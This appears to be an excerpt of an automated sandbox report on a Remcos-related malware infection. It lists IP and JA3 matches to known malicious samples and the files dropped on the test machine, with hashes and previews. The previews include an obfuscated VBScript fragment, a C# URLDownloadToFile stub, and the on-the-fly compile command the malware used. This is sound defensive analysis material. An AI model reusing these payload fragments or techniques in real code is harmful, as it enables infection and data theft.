                                                                                                        file.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 178.237.33.50
                                                                                                        AS-COLOCROSSINGUSgeneratethebstgoodpeoplesaroundtheworldwithgood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                        • 107.173.4.61
                                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 192.3.101.149
                                                                                                        Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                        • 107.173.4.61
                                                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                        • 192.3.22.13
                                                                                                        greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        • 192.3.243.136
                                                                                                        Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 172.245.123.3
                                                                                                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                        • 192.3.243.136
                                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                        • 192.3.22.13
                                                                                                        9srIKeD54O.rtfGet hashmaliciousUnknownBrowse
                                                                                                        • 192.3.101.150
                                                                                                        exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                        • 75.127.14.170

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eLSMU CITATA LT 20-11-2024#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 142.215.209.78
                                                                                                        prepper-wu.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        SnapshotPc.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        cYDCUkIGVB.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        cYDCUkIGVB.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        KRcLFIz5PCQunB7.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 142.215.209.78
                                                                                                        https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\remcos\logs.dat

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):144
                                                                                                        Entropy (8bit):3.3708727686148316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:rhlKlf4OlXlfKl84ql55JWRal2Jl+7R0DAlBG45klovDl6v:6lfJl1ClBql55YcIeeDAlOWAv
                                                                                                        MD5:6D351ED623CEB288B07797B930359AF5
                                                                                                        SHA1:274B715B27802828FA7AFD4216E05E37195D642B
                                                                                                        SHA-256:31F4F7ED39FAB7C9B92E3386EAA588765E08EC3C101792EF0454232C7AAA4793
                                                                                                        SHA-512:C03F18BFF94AEA71ABD966AB26DFFC6AC2619FB4E793790B65B178526CE2AEAEB77002ED5B984BC732981A4839390A6847448A27E0D26007795E8A7EA38686E5
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                        Preview:....[.2.0.2.4./.1.1./.2.0. .1.2.:.5.3.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiff

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):142466
                                                                                                        Entropy (8bit):3.674082413060924
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
                                                                                                        MD5:DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
                                                                                                        SHA1:7588E7A25BF351AC5A16ECA9B68686C7970E60E5
                                                                                                        SHA-256:99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
                                                                                                        SHA-512:D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
                                                                                                        Malicious:false
                                                                                                        Preview:..........F.u.n.c.t.i.o.n. .r.e.s.t.i.v.o.(.B.y.V.a.l. .a.m.b.a.r.i.n.o.,. .B.y.V.a.l. .p.n.e.o.m.e.t.r.i.a.,. .B.y.V.a.l. .c.o.n.t.r.a.m.a.r.t.e.l.o.s.)..... . . . .D.i.m. .e.s.f.a.l.f.a.m.e.n.t.o..... . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .e.s.f.a.l.f.a.m.e.n.t.o. .>. .0..... . . . . . . . .a.m.b.a.r.i.n.o. .=. .L.e.f.t.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .-. .1.). .&. .c.o.n.t.r.a.m.a.r.t.e.l.o.s. .&. .M.i.d.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.p.n.e.o.m.e.t.r.i.a.).)..... . . . . . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.c.o.n.t.r.a.m.a.r.t.e.l.o.s.).,. .a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . .L.o.o.p..... . . . ..... . . . .r.e.s.t.i.v.o. .=. .a.m.b.a.r.i.n.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):962
                                                                                                        Entropy (8bit):5.015105568788186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                        MD5:8937B63DC0B37E949F38E7874886D999
                                                                                                        SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                                        SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                                        SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                                        Malicious:false
                                                                                                        Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5829
                                                                                                        Entropy (8bit):4.901113710259376
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                        Malicious:false
                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................

                                                                                                        C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):487
                                                                                                        Entropy (8bit):3.787386295423015
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:V/DsYLDS81zuA3Q88NemMGlBHjQXReKJ8SRHy4HpuyCrK6P6gYy:V/DTLDfuJNeKuXfHnCBbYy
                                                                                                        MD5:920EC087C1649B37D3E112B3D5CEB653
                                                                                                        SHA1:43582D6BD4F01B5585CDE7DFF378FA59D38E7F7F
                                                                                                        SHA-256:D0C9B5992704CAA64BB5429349502AE370A05E995CFE05650EE7ECC4142E5BAA
                                                                                                        SHA-512:C79F661748E9176F0F01D405530C4704C7AAB611C2D614F537EA7A7778C846A98A6156DD1F35BBE5AB5644D9C582C1DE6D859925040C7A78AA44D21C19FFC673
                                                                                                        Malicious:false
                                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace IrRz.{. public class iAywni. {. [DllImport("urLMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr TckVLj,string VIV,string EXlnPJrpNQc,uint bEjz,IntPtr yZVSsDMddO);.. }..}.

                                                                                                        C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):377
                                                                                                        Entropy (8bit):5.322937001523699
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23f3rDZGzxs7+AEszIcNwi23f3rDZVLx:p37Lvkmb6KwZf8WZEJZfL9
                                                                                                        MD5:1DECD2F404896138AEAF4BB149CE129D
                                                                                                        SHA1:DBAE45A602BA189AA29CA656DB6E5A13ED485D8F
                                                                                                        SHA-256:A09EF4F27DC55E8B00FEAFB882D136DBD13DBAB4362D262A7489D0ABAB205390
                                                                                                        SHA-512:BB18505DCAC981E3485A0BB380B0091C80712EFB41AD7ED7BE6483D7E1BC0ED80D6AD3E5382A58CBA42B7F9B9F62B7EA136C19E2386254851918FA031E136BDF
                                                                                                        Malicious:true
                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs"

                                                                                                        C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3072
                                                                                                        Entropy (8bit):2.842843348304877
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:etGSVPBG5eAdF8O6kkFa+t4tkZf8fMEWI+ycuZhNsZakSvuPNnq:6WsAdeOsa+lJ8fMn1ulsZa3vyq
                                                                                                        MD5:4B8A27BC32CF94AD8C4323CC08322660
                                                                                                        SHA1:624C19A79622A753B92CA2C156A9B9E46F1FC7E9
                                                                                                        SHA-256:625AD420A4DB4378854F2CDF072B92F47F9598B69477B6033261F81B6AEED6A8
                                                                                                        SHA-512:E15198A1849C850E7CFA8AC970F6147842AE85F1BFB1B2D677343F28A2003469F1EDACF83B43EED2F3183FEA8610C4A97BA08D9EB7E1AEF7838A5E8F07001048
                                                                                                        Malicious:false
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :.....P ......L.........R.....Y.....].....i.....n...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.2c

                                                                                                        C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.out

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (458), with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):879
                                                                                                        Entropy (8bit):5.347222318404106
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Kwqd3ka6KgftEvfcKax5DqBVKVrdFAMBJTH:xika67lEvkK2DcVKdBJj
                                                                                                        MD5:7C25AD9F61F62E32BE4BCBD382FD716F
                                                                                                        SHA1:069D561928D62BAD910BF4CD0B969BFF309EC2ED
                                                                                                        SHA-256:9EB4110A62C6B04C45D1999E305A9732D738BDBB51FA92FE02FA7CE54CA32F88
                                                                                                        SHA-512:BE2B1C4EEE08D3B6B6733B98C13C629BBA2DA3D6A01E9D62806E5EDAD9D931B5F11E59EDC0754B5004603FF5EB4F9502426D49456BFE221BFABAB7FAA8246982
                                                                                                        Malicious:false
                                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                        C:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:MSVC .res
                                                                                                        Category:dropped
                                                                                                        Size (bytes):652
                                                                                                        Entropy (8bit):3.1231719906895323
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKZak7YnqqvuPN5Dlq5J:+RI+ycuZhNsZakSvuPNnqX
                                                                                                        MD5:2FBA3B1A353148DBA55CA9BEB94CA086
                                                                                                        SHA1:6DA47B128B477CB79FF92DB682C8F4A9AF36EC88
                                                                                                        SHA-256:5A30AB5E8E5272CCC7B8BC54F8682F1174A7C1617650EDB7D16057F65BA7556B
                                                                                                        SHA-512:7048E7EF1A80273653902466A61A0C15194AE9C5DE5E35890BA9E6328CEC03EC50EB031E16E656D03535FA0A8B200679323507B4A6478E3E98CE312D574F6AAA
                                                                                                        Malicious:false
                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.c.1.b.g.m.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.c.1.b.g.m.x.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                        C:\Users\user\AppData\Local\Temp\RES883E.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 17:52:41 2024, 1st section name ".debug$S"
                                                                                                        Category:modified
                                                                                                        Size (bytes):1340
                                                                                                        Entropy (8bit):4.036020662097255
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:HzK9o0fpMg+hZHdbwKOLmfWI+ycuZhNsZakSvuPNnqSed:T0BCZ9MKYm+1ulsZa3vyqS+
                                                                                                        MD5:8268EAABD44BF3C1D6A7A270A5ED2229
                                                                                                        SHA1:4D4F7E8C5E70C277866539205462043819FBABD4
                                                                                                        SHA-256:B0F0F0EBD0A89B9688DDB95CD536F8E873C54BE7CB32B1D7C581A4E197A1CD6C
                                                                                                        SHA-512:864F3325B78B8622614CBE42F828F010029612FC22CC89B902C5D59D3B3C753989B85166E70319DE7BEF7321CF6F831759437833240FEF455FEDE6295747FA0F
                                                                                                        Malicious:false
                                                                                                        Preview:L....!>g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP.............../.;.51H.\...L............7.......C:\Users\user~1\AppData\Local\Temp\RES883E.tmp.-.<....................a..Microsoft (R) CVTRES.`.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.c.1.b.g.m.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23tktpul.af1.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jwfpjpe.haj.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag1mfjzx.xjf.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw5s3ehw.lvg.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmdh42oq.w3x.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eytv0bik.whx.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

